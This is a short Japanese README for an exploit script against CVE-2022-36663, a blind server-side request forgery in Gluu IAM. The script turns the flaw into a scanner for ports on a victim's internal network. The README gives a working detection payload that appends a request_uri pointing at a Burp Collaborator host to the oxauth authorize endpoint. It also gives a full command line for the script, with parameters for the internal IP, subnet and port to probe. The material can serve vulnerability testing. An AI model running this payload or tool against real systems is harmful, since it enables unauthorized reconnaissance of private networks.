
Gluu IAM のブラインド SSRF を利用した内部ネットワークスキャナー
Gluu IAM はブラインド SSRF に対して脆弱であり、応答時間に基づいて内部ネットワークの開いているポートをスキャンするために悪用される可能性があります。
https://nvd.nist.gov/vuln/detail/CVE-2022-36663
ターゲットが脆弱かどうかを確認するには、/oxauth/restv1/authorize リクエストに &request_uri=http://burpcollab を追加し、ターゲットサーバーからの受信トラフィックをポーリングします。
python3 CVE-2022-36663.py --url https://target --ip 10.10.10.10 --port 8080 --ar '/oxauth/restv1/authorize?client_id=<clientID>&redirect_uri=https://target.com/return.html&response_type=code&scope=openid+profile+email+user_name&nonce=<nonce>&acr_values=simple_password_auth&request_uri='
Url - Gluu IAM サーバーの URL
IP - スキャンしたい内部 IP アドレスまたはサブネット
Port - スキャンしたい内部ポート
AR - 空の request_uri で終わる認証リクエスト URL
